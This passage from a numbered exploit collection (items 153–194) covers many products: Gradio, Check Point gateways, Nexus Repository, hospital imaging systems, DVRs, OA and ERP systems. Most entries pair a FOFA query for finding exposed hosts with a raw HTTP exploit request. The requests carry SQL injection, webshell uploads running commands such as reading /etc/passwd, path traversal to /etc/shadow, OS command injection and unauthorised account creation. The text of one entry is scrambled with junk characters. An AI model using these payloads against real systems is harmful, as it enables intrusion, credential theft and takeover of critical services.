User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request the /config file to obtain the component id
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd to a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access the cached copy
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwell (天维尔) fire and rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file at http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 操作系统命令注入
( c' Z% r, b, A( p' i6 s  }6 gCVE-2024-3721
; O* G$ D  x$ C( S* p' YFOFA:"Location: /login.rsp"
+ I1 u' _2 c; X  e$ n  a·TBK DVR-4104, F/ E# ]$ Y+ _3 x7 v" h
·TBK DVR-4216
+ S" o+ G/ c; k( D/ jcurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"9 B8 y8 [9 W* j4 |
7 Y0 ]5 S! }. P8 H
, o, }* Z. p' j' i. I
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
: }. {0 a/ H& E! g# {& z/ ^3 s; uHost: x.x.x.x* V! O8 n/ q- ?' z& u
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% y0 D# F8 H( F, o6 m  Z7 b  L
Connection: close
* R! Y1 O- o' b6 _& `Content-Length: 0, U" }: ^( M3 b$ M6 L% k& W
Cookie: uid=16 n7 }2 X+ T; E6 C3 H
Accept-Encoding: gzip
8 B! v) X. O1 J. K
% m7 y: `, z) U( j5 j7 f, l7 d! R- l
157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) medical image archiving and communication system WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>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</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓全智能停车收费系统 Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰多媒体信息发布系统 QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团分销管理系统 ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信票务管理平台 SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6车载定位监控平台 SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT-高清车牌识别摄像机 (DT HD license plate recognition camera) arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. 电信网关配置管理系统 rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C校园网自助服务系统 flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文工程管理系统 arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技企业标准化管理系统 AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创图书馆集群管理系统 updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼应用虚拟化系统 SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会视频会议 attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技临床浏览系统 deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通电子文档安全管理系统 NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下外贸ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
public bool IsReusable
{ get { return true; } }
public void ProcessRequest(HttpContext ctx)
{
ctx.Response.Write("test");
}
}

193. 山石网科云鉴安全管理系统 setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0


POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')


GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
